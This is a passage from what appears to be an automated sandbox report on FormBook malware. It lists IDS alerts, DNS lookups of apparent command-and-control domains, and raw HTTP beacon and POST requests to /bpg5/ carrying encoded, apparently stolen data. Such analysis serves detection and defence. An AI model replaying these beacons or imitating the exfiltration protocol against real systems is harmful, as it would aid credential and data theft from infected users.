                                        RT_VERSION0xb92300x23cdata
                                        RT_MANIFEST0xb946c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        192.168.2.3130.185.109.7749700802031449 05/30/23-19:34:04.337520TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970080192.168.2.3130.185.109.77
                                        192.168.2.3130.185.109.7749700802031453 05/30/23-19:34:04.337520TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970080192.168.2.3130.185.109.77
                                        192.168.2.3130.185.109.7749700802031412 05/30/23-19:34:04.337520TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970080192.168.2.3130.185.109.77

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 30, 2023 19:34:04.318782091 CEST4970080192.168.2.3130.185.109.77
                                        May 30, 2023 19:34:04.337090969 CEST8049700130.185.109.77192.168.2.3
                                        May 30, 2023 19:34:04.337291956 CEST4970080192.168.2.3130.185.109.77
                                        May 30, 2023 19:34:04.337519884 CEST4970080192.168.2.3130.185.109.77
                                        May 30, 2023 19:34:04.355952024 CEST8049700130.185.109.77192.168.2.3
                                        May 30, 2023 19:34:04.356035948 CEST8049700130.185.109.77192.168.2.3
                                        May 30, 2023 19:34:04.356098890 CEST8049700130.185.109.77192.168.2.3
                                        May 30, 2023 19:34:04.356424093 CEST4970080192.168.2.3130.185.109.77
                                        May 30, 2023 19:34:04.357168913 CEST4970080192.168.2.3130.185.109.77
                                        May 30, 2023 19:34:04.379757881 CEST8049700130.185.109.77192.168.2.3
                                        May 30, 2023 19:34:14.448467970 CEST4970180192.168.2.381.169.145.93
                                        May 30, 2023 19:34:14.467242956 CEST804970181.169.145.93192.168.2.3
                                        May 30, 2023 19:34:14.467367887 CEST4970180192.168.2.381.169.145.93
                                        May 30, 2023 19:34:14.467540979 CEST4970180192.168.2.381.169.145.93
                                        May 30, 2023 19:34:14.486296892 CEST804970181.169.145.93192.168.2.3
                                        May 30, 2023 19:34:14.487737894 CEST804970181.169.145.93192.168.2.3
                                        May 30, 2023 19:34:14.487771988 CEST804970181.169.145.93192.168.2.3
                                        May 30, 2023 19:34:14.487843990 CEST4970180192.168.2.381.169.145.93
                                        May 30, 2023 19:34:15.993897915 CEST4970180192.168.2.381.169.145.93
                                        May 30, 2023 19:34:16.997589111 CEST4970280192.168.2.381.169.145.93
                                        May 30, 2023 19:34:17.016526937 CEST804970281.169.145.93192.168.2.3
                                        May 30, 2023 19:34:17.016757011 CEST4970280192.168.2.381.169.145.93
                                        May 30, 2023 19:34:17.022908926 CEST4970280192.168.2.381.169.145.93
                                        May 30, 2023 19:34:17.041842937 CEST804970281.169.145.93192.168.2.3
                                        May 30, 2023 19:34:17.043265104 CEST804970281.169.145.93192.168.2.3
                                        May 30, 2023 19:34:17.043322086 CEST804970281.169.145.93192.168.2.3
                                        May 30, 2023 19:34:17.043426037 CEST4970280192.168.2.381.169.145.93
                                        May 30, 2023 19:34:18.529737949 CEST4970280192.168.2.381.169.145.93
                                        May 30, 2023 19:34:19.544343948 CEST4970380192.168.2.381.169.145.93
                                        May 30, 2023 19:34:19.563265085 CEST804970381.169.145.93192.168.2.3
                                        May 30, 2023 19:34:19.563391924 CEST4970380192.168.2.381.169.145.93
                                        May 30, 2023 19:34:19.563626051 CEST4970380192.168.2.381.169.145.93
                                        May 30, 2023 19:34:19.582351923 CEST804970381.169.145.93192.168.2.3
                                        May 30, 2023 19:34:19.582391977 CEST804970381.169.145.93192.168.2.3
                                        May 30, 2023 19:34:19.584112883 CEST804970381.169.145.93192.168.2.3
                                        May 30, 2023 19:34:19.584148884 CEST804970381.169.145.93192.168.2.3
                                        May 30, 2023 19:34:19.584626913 CEST4970380192.168.2.381.169.145.93
                                        May 30, 2023 19:34:21.578134060 CEST4970380192.168.2.381.169.145.93
                                        May 30, 2023 19:34:22.604475975 CEST4970480192.168.2.381.169.145.93
                                        May 30, 2023 19:34:22.623406887 CEST804970481.169.145.93192.168.2.3
                                        May 30, 2023 19:34:22.623584032 CEST4970480192.168.2.381.169.145.93
                                        May 30, 2023 19:34:22.623888016 CEST4970480192.168.2.381.169.145.93
                                        May 30, 2023 19:34:22.644185066 CEST804970481.169.145.93192.168.2.3
                                        May 30, 2023 19:34:22.645206928 CEST804970481.169.145.93192.168.2.3
                                        May 30, 2023 19:34:22.645272017 CEST804970481.169.145.93192.168.2.3
                                        May 30, 2023 19:34:22.645509958 CEST4970480192.168.2.381.169.145.93
                                        May 30, 2023 19:34:22.645837069 CEST4970480192.168.2.381.169.145.93
                                        May 30, 2023 19:34:22.666198015 CEST804970481.169.145.93192.168.2.3
                                        May 30, 2023 19:34:27.763421059 CEST4970580192.168.2.3198.177.124.57
                                        May 30, 2023 19:34:30.778844118 CEST4970580192.168.2.3198.177.124.57
                                        May 30, 2023 19:34:36.779321909 CEST4970580192.168.2.3198.177.124.57
                                        May 30, 2023 19:34:50.036931038 CEST4970580192.168.2.3198.177.124.57
                                        May 30, 2023 19:34:53.045865059 CEST4970580192.168.2.3198.177.124.57
                                        May 30, 2023 19:34:59.046427011 CEST4970580192.168.2.3198.177.124.57
                                        May 30, 2023 19:35:12.109210014 CEST4970580192.168.2.3198.177.124.57
                                        May 30, 2023 19:35:15.110249043 CEST4970580192.168.2.3198.177.124.57
                                        May 30, 2023 19:35:21.110759974 CEST4970580192.168.2.3198.177.124.57
                                        May 30, 2023 19:35:40.928462982 CEST4970580192.168.2.3198.177.124.57
                                        May 30, 2023 19:35:43.940848112 CEST4970580192.168.2.3198.177.124.57

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 30, 2023 19:34:04.241925955 CEST5238753192.168.2.38.8.8.8
                                        May 30, 2023 19:34:04.312834978 CEST53523878.8.8.8192.168.2.3
                                        May 30, 2023 19:34:14.389441013 CEST5692453192.168.2.38.8.8.8
                                        May 30, 2023 19:34:14.447483063 CEST53569248.8.8.8192.168.2.3
                                        May 30, 2023 19:34:27.674377918 CEST6062553192.168.2.38.8.8.8
                                        May 30, 2023 19:34:27.762007952 CEST53606258.8.8.8192.168.2.3
                                        May 30, 2023 19:34:49.898186922 CEST4930253192.168.2.38.8.8.8
                                        May 30, 2023 19:34:50.035706997 CEST53493028.8.8.8192.168.2.3
                                        May 30, 2023 19:35:12.078241110 CEST5397553192.168.2.38.8.8.8
                                        May 30, 2023 19:35:12.107281923 CEST53539758.8.8.8192.168.2.3
                                        May 30, 2023 19:35:40.911814928 CEST5113953192.168.2.38.8.8.8
                                        May 30, 2023 19:35:40.927103996 CEST53511398.8.8.8192.168.2.3

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        May 30, 2023 19:34:04.241925955 CEST192.168.2.38.8.8.80x5501Standard query (0)www.berlinhealthweek.comA (IP address)IN (0x0001)false
                                        May 30, 2023 19:34:14.389441013 CEST192.168.2.38.8.8.80x3233Standard query (0)www.musicandgros.comA (IP address)IN (0x0001)false
                                        May 30, 2023 19:34:27.674377918 CEST192.168.2.38.8.8.80x84a0Standard query (0)www.gomarketing.infoA (IP address)IN (0x0001)false
                                        May 30, 2023 19:34:49.898186922 CEST192.168.2.38.8.8.80x211aStandard query (0)www.gomarketing.infoA (IP address)IN (0x0001)false
                                        May 30, 2023 19:35:12.078241110 CEST192.168.2.38.8.8.80x1901Standard query (0)www.gomarketing.infoA (IP address)IN (0x0001)false
                                        May 30, 2023 19:35:40.911814928 CEST192.168.2.38.8.8.80xafdcStandard query (0)www.gomarketing.infoA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        May 30, 2023 19:34:04.312834978 CEST8.8.8.8192.168.2.30x5501No error (0)www.berlinhealthweek.com130.185.109.77A (IP address)IN (0x0001)false
                                        May 30, 2023 19:34:14.447483063 CEST8.8.8.8192.168.2.30x3233No error (0)www.musicandgros.commusicandgros.comCNAME (Canonical name)IN (0x0001)false
                                        May 30, 2023 19:34:14.447483063 CEST8.8.8.8192.168.2.30x3233No error (0)musicandgros.com81.169.145.93A (IP address)IN (0x0001)false
                                        May 30, 2023 19:34:27.762007952 CEST8.8.8.8192.168.2.30x84a0No error (0)www.gomarketing.info198.177.124.57A (IP address)IN (0x0001)false
                                        May 30, 2023 19:34:50.035706997 CEST8.8.8.8192.168.2.30x211aNo error (0)www.gomarketing.info198.177.124.57A (IP address)IN (0x0001)false
                                        May 30, 2023 19:35:12.107281923 CEST8.8.8.8192.168.2.30x1901No error (0)www.gomarketing.info198.177.124.57A (IP address)IN (0x0001)false
                                        May 30, 2023 19:35:40.927103996 CEST8.8.8.8192.168.2.30xafdcNo error (0)www.gomarketing.info198.177.124.57A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • www.berlinhealthweek.com
                                        • www.musicandgros.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.349700130.185.109.7780C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 30, 2023 19:34:04.337519884 CEST60OUTGET /bpg5/?ti-8=LyKdFPBKAe5W&5eb6=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA== HTTP/1.1
                                        Host: www.berlinhealthweek.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 30, 2023 19:34:04.356035948 CEST60INHTTP/1.1 404 Not Found
                                        Server: nginx/1.6.2
                                        Date: Tue, 30 May 2023 17:34:04 GMT
                                        Content-Type: text/html
                                        Content-Length: 168
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.34970181.169.145.9380C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 30, 2023 19:34:14.467540979 CEST63OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.musicandgros.com
                                        Connection: close
                                        Content-Length: 1478
                                        Cache-Control: no-cache
                                        Origin: http://www.musicandgros.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.musicandgros.com/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 35 65 62 36 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 44 6d 6a 63 53 66 41 63 67 6e 32 66 71 36 44 6c 65 33 4f 74 7a 50 52 32 51 79 54 78 32 6f 72 32 35 62 70 30 43 59 42 35 72 53 5a 46 4e 68 65 6a 31 4a 6f 70 55 7a 30 56 76 6e 31 79 45 32 7a 67 4d 52 69 56 67 59 4c 42 46 53 6c 71 37 28 71 65 77 37 6b 50 6d 5a 52 32 51 35 39 7e 37 62 6f 58 79 62 78 4c 54 35 52 4c 37 72 4c 4d 56 6b 55 39 38 4e 4d 45 59 4a 36 7a 39 50 6f 67 57 38 54 55 50 72 47 70 6b 38 30 72 30 68 35 4e 54 46 4b 53 42 44 65 77 56 70 2d 7a 6b 62 75 34 6d 52 75 48 58 6f 42 61 74 41 6c 30 70 70 4d 50 33 30 42 32 5a 33 45 72 77 57 6d 6d 32 41 39 54 30 41 2d 7e 70 6a 53 55 68 28 4a 58 4c 4a 2d 62 54 4b 57 6a 43 4e 45 4c 78 7e 6b 6a 57 69 6b 45 64 6c 41 72 39 76 67 61 69 41 6e 45 30 59 70 68 45 65 72 58 70 32 6c 58 64 77 35 45 45 4e 53 4e 68 72 31 59 4c 74 6d 73 56 79 37 71 6a 6f 59 57 34 37 42 72 77 31 4d 45 32 6b 42 6c 4c 36 6d 44 78 30 44 74 4b 56 36 61 79 79 6e 69 44 66 53 39 38 35 31 43 7a 75 72 70 6b 79 6f 39 39 36 65 76 64 78 79 65 4a 37 58 35 4f 41 53 6a 5f 34 6e 4c 6c 35 45 55 62 63 76 47 32 44 4b 4e 48 7e 43 38 76 35 4f 52 36 74 58 30 42 30 79 63 4b 44 57 6b 4a 41 4c 71 77 50 57 6e 31 67 44 44 65 67 2d 76 53 67 4f 65 55 28 41 4b 67 42 56 4b 48 70 4f 64 5f 38 41 28 4f 56 6c 65 56 41 76 6e 32 33 30 54 4f 30 6c 52 51 6c 37 69 76 37 61 6e 36 35 79 6d 68 77 64 70 72 39 33 51 4e 33 34 32 75 54 39 37 50 50 5f 7e 41 53 33 57 73 4d 57 54 39 55 6c 52 75 6b 58 49 45 6a 4c 7e 57 73 49 68 73 43 51 4f 47 45 54 78 71 6c 44 4f 69 50 79 4c 37 64 32 4d 67 79 43 7a 5a 44 38 4a 39 63 76 68 36 73 65 36 42 74 6f 51 46 44 76 74 57 4b 73 74 74 33 78 39 38 49 58 49 35 59 36 45 51 79 47 72 33 61 65 42 64 41 6d 50 78 74 62 30 70 6c 4a 4d 4b 56 73 71 6c 61 42 75 6c 30 2d 73 47 54 33 79 2d 49 34 67 6c 79 6f 67 75 71 4f 34 54 6d 4f 42 48 66 4f 63 72 46 76 39 68 6d 31 71 30 39 78 4a 67 28 64 35 38 45 67 4d 62 61 37 4a 4f 71 6b 61 6c 74 72 43 42 78 59 42 4a 46 58 32 4d 65 67 4c 70 38 73 31 77 52 4e 28 4e 6c 53 71 44 39 63 6f 79 46 6b 47 33 37 33 55 52 4f 74 46 4d 4d 66 6d 4f 34 38 32 72 4a 76 68 6d 70 56 7e 66 50 71 7a 35 53 78 55 71 56 51 63 63 51 51 56 34 41 54 55 7a 62 62 4b 4a 6e 6b 4a 2d 77 59 7e 6e 68 49 32 2d 56 4b 49 61 50 30 48 4c 46 6b 36 6b 38 5a 48 4d 52 31 28 46 44 4e 38 37 6b 47 71 35 45 52 76 69 78 2d 6c 6d 50 6c 65 45 4c 7a 78 67 58 7a 7a 79 70 6a 43 68 72 46 53 68 49 38 70 30 4f 51 38 34 76 62 31 42 43 64 54 31 57 58 33 51 46 62 73 6a 51 63 4d 73 7a 73 73 4f 70 75 68 61 72 5f 4c 51 5a 44 68 76 50 54 51 75 70 4c 6f 6b 72 39 50 47 6e 58 56 63 65 75 34 48 7e 66 41 52 4f 6c 32 71 6e 76 31 57 78 7a 4a 79 6e 6e 4c 45 46 58 43 71 47 58 6b 35 36 42 68 70 4a 5f 31 44 6c 38 43 65 6c 35 36 51 77 39 35 6f 49 4d 74 56 35 55 65 78 68 66 4f 6b 6d 74 42 44 38 57 37 39 48 71 63 33 4c 76 75 4e 6f 78 4e 6b 4b 7a 6e 37 74 51 28 63 58 4d 75 45 4a 75 45 68 44 56 6e 41 50 6f 6f 31 47 45 4e 5f 35 6f 6d 38 28 32 6e 53 76 5a 72 51 4f 71 75 6c 56 63 78 42 74 6f 4d 59 4d 37 28 43 65 65 6d 6d 59 77 64 70 70 4d 35 6f 38 37 46 7a 58 4d 79 73 43 5f 48 32 61 70 7a 55 72 38 4b 56 59 35 41 73 73 4a 77 6a 66 4a 6c 52 37 4c 73 53 67 36 77 4f 71 5a 66 50 7e 43 76 43 76 45 6c 69 75 33 74 37 4d 4a 30 54 36 46 76 39 73 36 52 70 6e 79 69 5f 73 51 5a 76 77 73 70 48 72 69 79 58 36 41 65 74 33 72 49 67 49 76 46 73 56 79 35 47 49 43 65 38 78 50 65 6e 57 5a 77 47 37 61 38 6e 4d 33 70 7a 78 41 66 2d 69 65 46 36 73 5f 7a 7a 6a 5f 42 55 4f 43 69 72 6b 53 48 44 61 57 6d 7a 54 78 6d 32 42 4e 67 37 30 62 54 6d 49 6b 7e 31 54 61 72 73 43 38 45 50 46 71 6e 5f 4d 49 4d 65 58 55 58 76 37 6f 66 54 59 4f 5a 65 52 50 72 48 46 6c 6d 38 59 68 49 48 32 61 47 56 79 61 79 63 70 49 31 76 39 65 6c 62 56 57 68 46 7a 57 74 32 6e 38 65 50 58 6c 79 72 6e 4e 6e 37 44 57 6b 4f 47 5f 45 61 36 47 35 41 6c 4b 66 55 77 57 59 2d 76 77 62 32 36 41 52 4c 58 73 4d 5f 31 45 41 6d 4e 70 53 31 49 52 7e 69 77 71 70 6a 65 4c 54 5f 66 41 69 47 50 6e 34 5a 33 6c 72 6d 75 79 52 5a 55 49 51 76 58 61 4a 68 61 2d 49 4e 4c 35 61 49 34 71 6e 31 5a 61 53 43 61 67 6d 75 70 49 57 39 28 75 66 53 72 76 78 46 6a 5a 71 74 4b 77 38 36 44 67 41 4e 70 72 73 77
                                        Data Ascii: 5eb6=jKc5GkmqQWJekDmjcSfAcgn2fq6Dle3OtzPR2QyTx2or25bp0CYB5rSZFNhej1JopUz0Vvn1yE2zgMRiVgYLBFSlq7(qew7kPmZR2Q59~7boXybxLT5RL7rLMVkU98NMEYJ6z9PogW8TUPrGpk80r0h5NTFKSBDewVp-zkbu4mRuHXoBatAl0ppMP30B2Z3ErwWmm2A9T0A-~pjSUh(JXLJ-bTKWjCNELx~kjWikEdlAr9vgaiAnE0YphEerXp2lXdw5EENSNhr1YLtmsVy7qjoYW47Brw1ME2kBlL6mDx0DtKV6ayyniDfS9851Czurpkyo996evdxyeJ7X5OASj_4nLl5EUbcvG2DKNH~C8v5OR6tX0B0ycKDWkJALqwPWn1gDDeg-vSgOeU(AKgBVKHpOd_8A(OVleVAvn230TO0lRQl7iv7an65ymhwdpr93QN342uT97PP_~AS3WsMWT9UlRukXIEjL~WsIhsCQOGETxqlDOiPyL7d2MgyCzZD8J9cvh6se6BtoQFDvtWKstt3x98IXI5Y6EQyGr3aeBdAmPxtb0plJMKVsqlaBul0-sGT3y-I4glyoguqO4TmOBHfOcrFv9hm1q09xJg(d58EgMba7JOqkaltrCBxYBJFX2MegLp8s1wRN(NlSqD9coyFkG373UROtFMMfmO482rJvhmpV~fPqz5SxUqVQccQQV4ATUzbbKJnkJ-wY~nhI2-VKIaP0HLFk6k8ZHMR1(FDN87kGq5ERvix-lmPleELzxgXzzypjChrFShI8p0OQ84vb1BCdT1WX3QFbsjQcMszssOpuhar_LQZDhvPTQupLokr9PGnXVceu4H~fAROl2qnv1WxzJynnLEFXCqGXk56BhpJ_1Dl8Cel56Qw95oIMtV5UexhfOkmtBD8W79Hqc3LvuNoxNkKzn7tQ(cXMuEJuEhDVnAPoo1GEN_5om8(2nSvZrQOqulVcxBtoMYM7(CeemmYwdppM5o87FzXMysC_H2apzUr8KVY5AssJwjfJlR7LsSg6wOqZfP~CvCvEliu3t7MJ0T6Fv9s6Rpnyi_sQZvwspHriyX6Aet3rIgIvFsVy5GICe8xPenWZwG7a8nM3pzxAf-ieF6s_zzj_BUOCirkSHDaWmzTxm2BNg70bTmIk~1TarsC8EPFqn_MIMeXUXv7ofTYOZeRPrHFlm8YhIH2aGVyaycpI1v9elbVWhFzWt2n8ePXlyrnNn7DWkOG_Ea6G5AlKfUwWY-vwb26ARLXsM_1EAmNpS1IR~iwqpjeLT_fAiGPn4Z3lrmuyRZUIQvXaJha-INL5aI4qn1ZaSCagmupIW9(ufSrvxFjZqtKw86DgANprswrPdPQl8d1MRZZKirh9B1eIa7exjz047MfS8f2anEsyus3QuGDihS0dHSlAsnn2Gqy2T71QPVToGBoIaCsG61Zq8hLWR1vVUDvP5qLiIDtfcjUx
                                        May 30, 2023 19:34:14.487737894 CEST63INHTTP/1.1 404 Not Found
                                        Date: Tue, 30 May 2023 17:34:14 GMT
                                        Server: Apache/2.4.57 (Unix)
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.34970281.169.145.9380C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 30, 2023 19:34:17.022908926 CEST64OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.musicandgros.com
                                        Connection: close
                                        Content-Length: 186
                                        Cache-Control: no-cache
                                        Origin: http://www.musicandgros.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.musicandgros.com/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 35 65 62 36 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 45 47 6a 63 44 66 41 65 41 6e 32 52 4b 36 44 75 2d 33 79 74 7a 44 7a 32 52 33 65 78 68 38 72 33 6f 48 70 31 77 77 42 7e 72 53 61 4e 74 68 61 7e 46 49 31 70 55 7a 43 56 76 72 31 79 45 79 7a 68 70 56 69 63 45 4d 49 63 6c 53 72 7e 4c 28 33 65 77 32 51 50 6d 56 37 32 55 42 39 7e 36 33 6f 51 78 7a 78 41 52 68 52 50 4c 72 4e 64 31 6b 59 39 38 41 49 45 63 55 33 7a 39 6a 6f 67 6e 67 54 56 65 4c 47 28 6a 67 30 38 6b 68 30 47 44 45 36 55 79 53 72 38 6c 4e 4a 33 58 28 50 77 77 6f 6a 43 6b 31 6a 4d 67 29 2e 00 00 00 00 00 00 00 00
                                        Data Ascii: 5eb6=jKc5GkmqQWJekEGjcDfAeAn2RK6Du-3ytzDz2R3exh8r3oHp1wwB~rSaNtha~FI1pUzCVvr1yEyzhpVicEMIclSr~L(3ew2QPmV72UB9~63oQxzxARhRPLrNd1kY98AIEcU3z9jogngTVeLG(jg08kh0GDE6UySr8lNJ3X(PwwojCk1jMg).
                                        May 30, 2023 19:34:17.043265104 CEST65INHTTP/1.1 404 Not Found
                                        Date: Tue, 30 May 2023 17:34:17 GMT
                                        Server: Apache/2.4.57 (Unix)
                                        Content-Length: 196
                                        Connection: close
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.34970381.169.145.9380C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 30, 2023 19:34:19.563626051 CEST71OUTPOST /bpg5/ HTTP/1.1
                                        Host: www.musicandgros.com
                                        Connection: close
                                        Content-Length: 5334
                                        Cache-Control: no-cache
                                        Origin: http://www.musicandgros.com
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://www.musicandgros.com/bpg5/
                                        Accept-Language: en-US
                                        Accept-Encoding: gzip, deflate
                                        Data Raw: 35 65 62 36 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 32 78 4f 6a 52 41 33 41 4c 51 6e 35 55 4b 36 44 6c 65 33 4d 74 7a 50 7a 32 51 79 54 78 7a 51 72 32 37 28 70 31 53 59 42 34 72 53 61 47 4e 68 65 6a 31 4a 33 70 56 54 6b 56 76 37 4c 79 43 71 7a 67 38 52 69 55 45 4d 4c 42 56 53 6d 28 4c 28 6f 54 51 32 51 50 6d 5a 64 32 52 74 48 7e 34 72 6f 58 44 4c 78 41 54 35 53 64 72 72 49 46 31 6b 59 39 38 4d 4e 45 63 55 4a 7a 39 72 34 67 6b 6f 54 58 4d 44 47 76 6e 55 37 31 55 68 7a 4a 54 46 56 53 42 50 64 77 56 6c 71 7a 6e 50 75 34 52 70 75 48 6e 34 42 54 34 55 6c 79 35 70 4b 4c 33 30 42 79 5a 33 46 72 77 57 2d 6d 32 41 39 54 30 4d 2d 7e 35 54 53 55 53 6e 4b 56 4c 4a 2d 62 54 4b 4a 6a 43 4e 48 4c 78 7e 67 6a 54 61 6b 45 59 78 41 71 73 76 67 65 77 6f 67 4c 6b 59 76 68 45 65 6d 42 5a 32 48 58 63 55 35 45 45 42 43 4e 69 62 31 59 37 4e 6d 71 45 79 38 67 7a 6f 6e 58 34 37 63 72 77 78 75 45 32 38 64 6c 4b 4c 44 41 43 4d 44 74 6f 74 36 58 42 61 6e 6a 7a 66 54 32 63 35 43 4a 54 69 4c 70 69 57 65 39 38 36 65 76 74 4a 79 4d 4a 72 58 73 73 59 52 70 50 34 67 52 56 35 63 51 62 51 62 47 79 54 34 4e 45 76 70 38 71 42 4f 52 4a 46 58 6d 44 63 79 64 61 44 5a 6e 4a 41 50 70 41 4f 5a 6e 31 63 44 44 64 77 45 76 53 34 4f 65 33 6e 41 42 56 74 61 49 6e 70 56 55 66 38 62 28 4f 59 7a 65 52 73 5a 6e 33 36 50 54 4e 63 6c 52 54 39 37 6d 39 54 61 6f 71 35 4f 70 42 77 55 34 62 38 65 51 4e 76 38 32 76 62 74 36 37 7a 5f 7e 78 79 33 52 75 6b 58 56 39 56 4e 50 65 6b 45 49 46 66 6a 7e 57 42 5a 68 73 48 56 50 31 30 54 78 76 35 44 49 52 6e 7a 45 37 64 74 50 67 7a 42 6d 4a 47 6d 4a 35 38 7a 68 37 55 77 36 47 31 6f 51 46 44 76 73 47 4b 73 7a 4e 33 30 6b 73 49 41 43 5a 45 6a 45 55 61 77 72 32 61 4f 42 6f 77 6d 4a 42 74 62 31 62 4e 4f 4f 61 56 71 6e 46 61 33 31 31 31 59 73 47 50 5a 79 2d 42 76 67 6c 6d 6f 6e 4f 71 4f 6f 32 53 4f 65 48 66 4d 58 4c 46 53 35 68 61 62 71 30 39 4c 4a 6b 36 77 35 2d 6f 67 4e 70 53 37 43 2d 71 6c 61 31 74 77 42 42 78 52 4c 70 35 70 32 4d 75 6b 4c 6f 34 73 31 77 42 4e 38 50 39 53 72 68 6c 44 6a 79 46 66 58 48 37 59 55 52 4f 33 46 4d 4d 78 6d 4f 67 38 78 63 78 76 67 32 35 56 39 50 50 71 39 35 53 7a 55 71 55 4e 57 38 51 64 56 34 4d 70 55 33 37 4c 4b 49 50 6b 4a 4e 30 59 71 47 68 49 69 65 56 4a 4a 61 50 77 5a 37 45 71 36 6b 41 43 48 50 35 31 28 42 72 4e 38 6f 73 47 74 34 45 52 71 53 78 46 6e 6d 4f 38 61 45 57 71 78 6b 4c 72 7a 7a 78 56 43 56 66 46 53 7a 67 38 74 32 32 54 77 59 76 62 79 42 44 63 45 6c 72 75 33 51 42 68 73 68 31 58 4d 59 6e 73 73 38 42 75 77 70 7a 5f 54 51 5a 4b 